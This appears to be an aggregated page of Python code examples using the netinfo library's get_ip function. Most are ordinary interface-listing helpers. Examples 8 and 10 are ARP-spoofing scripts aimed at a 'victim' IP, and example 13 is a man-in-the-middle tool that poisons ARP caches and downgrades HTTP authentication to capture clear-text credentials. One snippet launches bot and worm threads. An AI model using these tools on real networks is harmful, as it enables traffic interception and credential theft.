Beispiel #1
0
 def __init__(self, dest_ip, outgoing_iface, packet_count):
     super(BaseSniff, self).__init__()
     self.outgoing_iface = outgoing_iface
     self.packet_count = packet_count
     src_ip = netinfo.get_ip(outgoing_iface)
     self.filter = "icmp and src host %s and dst host %s" % (src_ip, dest_ip)
     self.sent = 0
Beispiel #2
0
 def getSystemIps():
     """ will not return the localhost one """
     IPs = []
     for interface in NetInfo.getSystemIfs():
         if not interface.startswith('lo'):
             ip = netinfo.get_ip(interface)
             IPs.append(ip)
     return IPs
Beispiel #3
0
def getPublicIPs():
    ips = []

    interfaces = netinfo.list_active_devs()
    for interface in interfaces:
        if not interface.startswith('lo'):
            ip = netinfo.get_ip(interface)
            ips.append(ip)

    return ips
Beispiel #4
0
def getPublicIPs():
    ips = []

    interfaces = netinfo.list_active_devs()
    for interface in interfaces:
        if not interface.startswith("lo"):
            ip = netinfo.get_ip(interface)
            ips.append(ip)

    return ips
Beispiel #5
0
def getMyIP():

    # Change this to retrieve and
    # return the IP of the current system.
    # The IP address
    for dev in netinfo.list_active_devs():
        # The IP address of the interface
        addr = netinfo.get_ip(dev)
        # Get the IP address
        if not addr == "127.0.0.1":
            # Save the IP address and break
            return addr
def init_tv():
	global lan_ip
	global wan_ip
	global wlan_ip
	global tv_thread
	for dev in netinfo.list_active_devs():
		print dev
		if dev == 'eth0':
			lan_ip = netinfo.get_ip(dev)
			print 'get lan ip:',lan_ip
			print dev
			print netinfo.get_ip(dev)
		elif dev == 'wlan0':
			wlan_ip = netinfo.get_ip(dev)
			print wlan_ip
		elif dev == 'lo':
			print 'local ip'
		##todo wan ip
		elif dev == 'ppp0':
			wan_ip = netinfo.get_ip(dev)
	
	tv_thread.setDaemon(True)
	tv_thread.start()
Beispiel #7
0
def main():
    """ Main driver for the bot
    """
    global ID

    if ID.startswith('127.'):  # maybe in a VM environment
        try:
            import netinfo

            ID = netinfo.get_ip('enp0s3')
        except:
            pass

    threading.Thread(target=bot_driver).start()
    threading.Thread(target=worm_driver, args=(ID, )).start()
Beispiel #8
0
from ifparser import Ifcfg

def MAC_parser(host):
    os.popen('ping -c 1 %s' % host)
    fields = os.popen('grep "%s " /proc/net/arp' % host).read().split()
    if len(fields) == 6 and fields[3] != "00:00:00:00:00:00":
        return fields[3]
    else:
        print 'no response from', host

victim_ip = raw_input("Input victim_ip : ")
ifdata = Ifcfg(commands.getoutput('ifconfig -a'))
ifdata.interfaces
eth0 = ifdata.get_interface('eth0')
eth0.BROADCAST
mac_add = eth0.hwaddr
ip_add = netinfo.get_ip('eth0')
strs =  subprocess.check_output(shlex.split('ip r l'))
match_string = r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
gateway = re.search('default via ' + match_string, strs).group(1)
print "ip_add  : "+ip_add
print "mac_add : "+mac_add
print "gateway : "+gateway
if os.geteuid() != 0:
	sys.exit("*** Please run as root ***")
victim_MAC = MAC_parser(victim_ip)
print "victim_MAC  : "+victim_MAC
gateway_MAC = MAC_parser(gateway)
print 'gateway_MAC : ' + gateway_MAC
send(ARP(op=ARP.who_has, pdst=ip_add, psrc=victim_ip, hwdst=mac_add))
Beispiel #9
0
 def get_myip(self, iface):
     return netinfo.get_ip(iface)
Beispiel #10
0
	if len(fields) == 6 and fields[3] != "00:00:00:00:00:00":
		return fields[3]
	else:
		print ' ***** use sudo plz *****' ,host

vic_ip = raw_input("plz write victim's ip :")
data = Ifcfg(commands.getoutput('ifconfig -a'))

data.interfaces

enp0s3 = data.get_interface('enp0s3')

enp0s3.BROADCAST

add_mac = enp0s3.hwaddr
add_ip = netinfo.get_ip('enp0s3')
strs = subprocess.check_output(shlex.split('ip r l'))
string_match = r'(\d{1,3}\.\d{1.3}\.\d{1.3}\.\d{1.3})'
gateway = re.search('default via ' + string_match, strs)



print "add_ip     : "+add_ip
print "add_mac    : "+add_mac
print "geteway    : "+gateway

if os.geteuid() !=0 :
	sys.exit(" ********** use sudo plz **********")


mac_victim = mac_parser(ip_victim)
def runMaster(options):
	#TODO
	location='-'.join(options['L'])
	provider='-'.join(options['P'])
	contype='-'.join(options['C'])
	#DoDial()
	#sys.exit(0)
	#pdial=sub.Popen(["sudo","python","dial.py"])
	ifup=0
	while ifup!=1:
		try:
        		ip=netinfo.get_ip('ppp0')
			ifup=1
		except Exception as e:
			print "here"
			ifup=0
        ipf=open('ip.txt','w')
        ipf.write(ip)
        ipf.close()
        iperfport=open('iperf_port.txt','w')
        iperfport.write(str(random.randint(1500,10000)))
        iperfport.close()
	global EXP_DIR
        global SERVER_PARAM
        #print type(options['r'])
        timestamp=time.strftime('%s')
        if options['r']==None:
                #Adding Roaming  Test
                EXP_DIR=EXP_DIR+location+'_'+provider+'_'+contype+'/'+timestamp
                SERVER_PARAM=hostname+'/'+location+'_'+provider+'_'+contype+'/'+timestamp
	else:
		EXP_DIR=EXP_DIR+location+'_'+provider+'_'+contype+'/Roam/'+'_'.join(options['r'])+'_'+timestamp
                SERVER_PARAM=hostname+'/'+location+'_'+provider+'_'+contype+'/Roam/'+timestamp
	if options['re']!=None:
		EXP_DIR=options['re'][0]
		SERVER_PARAM=options['re'][1]
	if not os.path.exists(EXP_DIR):
		os.makedirs(EXP_DIR)
	fstat.write('Resume Args:\n 1.'+EXP_DIR+'\n'+'2.'+SERVER_PARAM+'\n')
	sigdict={}
	pickle.dump(sigdict,open(EXP_DIR+"/sigdict",'wb'))
	psigstr=sub.Popen(["python","sigstr.py","CDMA",EXP_DIR])    #change here for gsm or cdma "GSM" or "CDMA"
	if options['t']:
		#Adding Downlink Test
		fcurl=open('testArgs/curl','r')
		lines=fcurl.readlines()
		lines=[x.split('\n')[0] for x in lines]
		if argsFine(lines,'curl'):			
			run_curl(lines)
		else:
			logTo(TESTSUITE_LOG,'Error in parsing Curl args Missing or wrong Args in testArgs/curl','ERROR','w')
			sys.exit('Error! Check suite.log for more details...')
		fcurl.close()
		#Adding Iperf Uplink Test
                fperf=open('testArgs/iperf','r')
                lines=fperf.readlines()
                lines=[x.split('\n')[0] for x in lines]
                if argsFine(lines,'iperf'):
			run_iperf(lines)
                else:
                        logTo(TESTSUITE_LOG,'Error in parsing Iperf args Missing or wrong Args in testArgs/iperf','ERROR','w')
                        sys.exit('Error! Check suite.log for more details...')
                fperf.close()
	if options['l']:
		#Adding Latency Tests
                fping=open('testArgs/ping','r')
                lines=fping.readlines()
                lines=[x.split('\n')[0] for x in lines]
		if contype=='3g':
			pping=sub.Popen(["ping","-s","512","-n","106.187.35.87"])
		for line in lines:
			run_ping(line)
		fping.close()
		run_ping_gw()
		pping.terminate()
		fstat.write('Finished Latency\n')
	if options['T']:
		#Addding Tcptraceroute tests
		ftr=open('testArgs/tcptraceroute','r')
                lines=ftr.readlines()
                lines=[x.split('\n')[0] for x in lines]
		if contype=='3g':
			pping=sub.Popen(["ping","-s","512","-n","106.187.35.87"])
                for line in lines:
                        run_tcptraceroute(line)
                ftr.close()
		pping.terminate()
		fstat.write('Finished Tcptraceroute\n')
	if options['n']:
		#Adding ICSI Netalyzr Test
                run_netalyzr()
	if options['p']:
		#Adding PLT Selenium Test
                fplt=open('testArgs/selenium','r')
                lines=fplt.readlines()
                lines=[x.split('\n')[0] for x in lines]
                for line in lines:
                        run_selenium(line)
                fplt.close()
		fstat.write('Finished Selenium\n')
        if options['c']:
                #Adding CDN performance Test
		if contype=='3g':
			pping=sub.Popen(["ping","-s","512","-n","106.187.35.87"])
                run_CDN()
		pping.terminate()
        if options['i']:
                #Adding IP Spoofing  Test
                fipspoof=open('testArgs/ipspoof','r')
                lines=fipspoof.readlines()
                lines=[x.split('\n')[0] for x in lines]
                if argsFine(lines,'ipspoof'):
                	run_ipspoof(lines)
		else:
                        logTo(TESTSUITE_LOG,'Error in parsing Ipsoof args Missing or wrong Args in testArgs/ipspoof','ERROR','w')
                        sys.exit('Error! Check suite.log for more details...')
                fipspoof.close()
        if options['s']:
                #Adding Statefull Firewall Test
                ffire=open('testArgs/firewall','r')
                lines=ffire.readlines()
                lines=[x.split('\n')[0] for x in lines]
                if argsFine(lines,'firewall'):
                	run_firewall(lines)
		else:
                        logTo(TESTSUITE_LOG,'Error in parsing Iperf args Missing or wrong Args in testArgs/firewall','ERROR','w')
                        sys.exit('Error! Check suite.log for more details...')
                ffire.close()
        if options['b']:
                #Adding Buffer Size Test
		fbuff=open('testArgs/buffer','r')
                lines=fbuff.readlines()
                lines=[x.split('\n')[0] for x in lines]
		if contype=='3g':
			srate1=1000
			srate2=2000
		else:
			srate1=200
			srate2=250
                if argsFine(lines,'buffer'):
                	run_buffer(lines,srate1,srate2)
		else:
                        logTo(TESTSUITE_LOG,'Error in parsing Buffer args Missing or wrong Args in testArgs/buffer','ERROR','w')
                        sys.exit('Error! Check suite.log for more details...')
                fbuff.close()
	psigstr.terminate()
import netinfo
for dev in netinfo.list_active_devs():
	print "*********************************"
	print dev
	print "mac: "+netinfo.get_hwaddr(dev)
	print "ip: "+netinfo.get_ip(dev)
	print "netmask: "+netinfo.get_netmask(dev)
	print "broadcast: "+netinfo.get_broadcast(dev)
print "######################################"
for route in netinfo.get_routes():
    print route['dest']+"/"+route['netmask']+" -> "+route['gateway']


#netinfo.del_route("", "192.168.0.0", "164.11.222.253", "255.255.255.0");
Beispiel #13
0
def main():

	parser = argparse.ArgumentParser(description="""
	HTTP Authentication downgrade tool
	----------------------------------

	This tool is a man-in-the-middle utility intended to downgrade authentication requests it receives 
	to Basic in order to capture clear-text credentials.  This is done by:

		- ARP cache poisoning the target(s) to redirect their traffic to the attacker ;
		- Starting a local HTTP proxy instance ;
		- Redirecting the targets' connections to the specified ports to the local proxy ;
		- Relaying HTTP/S traffic to and from clients ;
		- Intercepting NTLM, Negotiate and Digest auth. requests from the remote web servers or proxy ;
		- Rewriting the responses to request Basic authentication.

	HTTPS will be intercepted if port 443 is specified, however clients may see certificate warnings.
	
	Levels of attakcs from stealthiest to noisiest (different levels can be used simultaneously):

	1. Downgrade authentication requests in 407 responses (most likely domain accounts)
	2. Downgrade authentication requests in 401 responses (for web apps / intranets / ...)
	3. Rewrite 200 responses to 401 to force authentication (very intrusive)

	By default the tool will stop all attacks towards any given client after clear-text credentials have
	been captured from this client.  To continue attacking no matter what, this can be disabled with the 
	--nonstop option (very intrusive++).

	Example usage: %s --iface eth0 --levels 1,2 192.168.1.0/24

	""" % sys.argv[0], formatter_class=argparse.RawTextHelpFormatter)

	parser.add_argument('target',    metavar='<target>',  action='store', help="Comma-sparated list of target IP addresses or CIDR networks")
	parser.add_argument('--router',  default=None,     metavar='<router>',  action='store', help="Local network gateway (default: autodetect)")
	parser.add_argument('--iface',   default='eth0',   metavar='<iface>',   action='store', help="Network interface card to use (default: eth0)")
	parser.add_argument('--nofw',    default=False,    action='store_true', help="Do not auto-configure routing and iptables rules (default: false)")
	parser.add_argument('--noarp',   default=False,    action='store_true', help="Do not ARP poison (default: false)")
	parser.add_argument('--freq',    default=5.0,      metavar='<freq>',    action='store', type=float, help="ARP poison packets frequency in seconds (default: 5)")
	parser.add_argument('--ports',   default='80',     metavar='<ports>',   action='store', help="Comma seperated list of ports to intercept (default: 80)")
	parser.add_argument('--proxy',   default=None,     metavar='<proxy>',   action='store', help="External proxy to forward clients' traffic to (format: ip:port)\n\n")
	parser.add_argument('--nonstop', default=False,    action='store_true', help="Continue attacking clients after capturing credentials (default: false) ")
	parser.add_argument('--levels',  default='1',      metavar='<levels>',  action='store', help="Comma separated list of attack levels. See above for description (default: 1)\n\n")
	parser.add_argument('--verbose', default=False,    action='store_true', help="Enable verbose output")
	
	config.init()
	config.cfg.args = parser.parse_args()
	arp_threads = []
	proxy_threads = []
	 
	try:
		config.cfg.args.local_ip = netinfo.get_ip(config.cfg.args.iface)
	except:
		print "[!] Error: Interface %s not found" % config.cfg.args.iface
		sys.exit(0)

	for route in netinfo.get_routes():
		if route['dest'] == '0.0.0.0':
			config.cfg.args.router = route['gateway']

	if config.cfg.args.router == None:
		print "Error: could not detect default gateway"
		sys.exit(0)

	try:
		config.cfg.args.levels = [int(x) for x in config.cfg.args.levels.split(',')]
	except:
		print "[!] Invalid level specified."
		sys.exit()

	# Using upstream proxy
	if config.cfg.args.proxy is not None:

		config.cfg.args.proxy = config.cfg.args.proxy.rstrip('/').replace('http://', '').replace('https://', '')
		config.cfg.args.proxy = config.cfg.args.proxy.split(':')

		try:    config.cfg.args.proxy = (config.cfg.args.proxy[0], int(config.cfg.args.proxy[1]))
		except: config.cfg.args.proxy = (config.cfg.args.proxy[0], 8080)

		# Test upstream proxy connection
		s = socket.socket()
		try:
			s.connect((config.cfg.args.proxy[0], config.cfg.args.proxy[1]))
			s.close()
		except Exception as e: 
			print "[!] Error: Unable to connect to proxy."
			s.close()
			sys.exit()

	config.cfg.args.ip_list = []
	for i in config.cfg.args.target.split(','):
		if '/' in i:
			net = netaddr.IPNetwork(i)
			config.cfg.args.ip_list = config.cfg.args.ip_list + [str(x) for x in net if x not in [net.network, net.broadcast]]
		else:
			config.cfg.args.ip_list.append(i)

	# Start proxy
	for port in config.cfg.args.ports.split(","):
		try:
			port = int(port)
		except:
			print "Wrong port"
			sys.exit()
	
		print "[*] Starting proxy on  %s:%d..." % (config.cfg.args.local_ip, port)
		
		t = proxy.ProxyThread(config.cfg.args.local_ip, port)
		proxy_threads.append(t)
		t.start()

	# Configure iptables
	if config.cfg.args.nofw == False:
		if os.getuid() != 0:
			print "[!] Error: Must run as root to auto-configure routing and iptables rules"
			sys.exit(0)
		else:
			conf_ip_forward()

	config.cfg.my = (netinfo.get_ip(config.cfg.args.iface), netinfo.get_hwaddr(config.cfg.args.iface))
	config.cfg.router = (config.cfg.args.router, '')
	config.cfg.clients = {}

	# Start ARP poison thread
	if config.cfg.args.noarp == False:
		scapy_conf.iface = config.cfg.args.iface

		print "[*] Poisoning ARP caches..."
		for addr in config.cfg.args.ip_list:
			
			# exclude myself and router
			if addr in [config.cfg.my[0], config.cfg.router[0]]:
				continue

			t = ArpPoisonThread(addr)
			arp_threads.append(t)
			t.start()

	try:
		while 1:
			time.sleep(1)

	except KeyboardInterrupt:
		print "\r\nKilling ARP Poisoning threads..."
		for t in arp_threads:
			t.kill()

		print "Killing Proxy threads..."
		for t in proxy_threads:
			t.server.shutdown()

		clean_exit()
Beispiel #14
0
def isMyAddr(addr):
    for devName in netinfo.list_active_devs():
        #print "Addr %s %s" % (netinfo.get_ip(devName),  addr)
        if cmp(netinfo.get_ip(devName),  addr) == 0:
            return True
    return False
Beispiel #15
0
def getInetAddress():
    interface = getDefaultGatewayInterfaceName()
    return netinfo.get_ip(interface)
Beispiel #16
0
def get_local_ips():
    inetIPs = []
    for interface in netinfo.list_active_devs():
        ip = netinfo.get_ip(interface)
        inetIPs.append(ip)
    return inetIPs
Beispiel #17
0
####################################################
# Returns the IP of the current system
# @param interface - the interface whose IP we would
# like to know
# @return - The IP address of the current system
####################################################
def getMyIP():
	
	# Change this to retrieve and
	# return the IP of the current system.
    # The IP address
	addrs = []
    for dev in netinfo.list_active_devs():
        # The IP address of the interface
        ip = netinfo.get_ip(dev)
        # Get the IP address
        if not addr == "127.0.0.1":
            # Save the IP address and break
            addrs.append(ip)
    return addrs

#######################################################
# Returns the list of systems on the same network
# @return - a list of IP addresses on the same network
# ** I added the current machines IP as an argument so
# ** we don't have to hard code the subnet
#######################################################
def getHostsOnTheSameNetwork(myips):
	
	# Add code for scanning
Beispiel #18
0
#    www.sassan.me.uk
#    pypi.python.org/pypi/pynetinfo/

#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program; if not, write to the Free Software
#    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA

import netinfo
for dev in netinfo.list_active_devs():
    print "*********************************"
    print dev
    print "mac: " + netinfo.get_hwaddr(dev)
    print "ip: " + netinfo.get_ip(dev)
    print "netmask: " + netinfo.get_netmask(dev)
    print "broadcast: " + netinfo.get_broadcast(dev)
print "######################################"
for route in netinfo.get_routes():
    print route['dest'] + "/" + route['netmask'] + " -> " + route['gateway']

#netinfo.del_route("", "192.168.0.0", "164.11.222.253", "255.255.255.0");
Beispiel #19
0
 def run(self):
     send(IP(src=netinfo.get_ip(self.outgoing_iface), dst=DEST_IP) / ICMP(),
          iface=self.outgoing_iface,
          count=self.packet_count,
          verbose=False)
Beispiel #20
0
def getMyIP():
	for interface in netinfo.list_active_devs():
		if not interface.startswith('lo'):
			return netinfo.get_ip(interface)
Beispiel #21
0
def getMyIP(interface):

    return netinfo.get_ip(interface)
Beispiel #22
0
def get_ip():
    return tuple([info.get_ip(iface) for iface in info.list_active_devs()])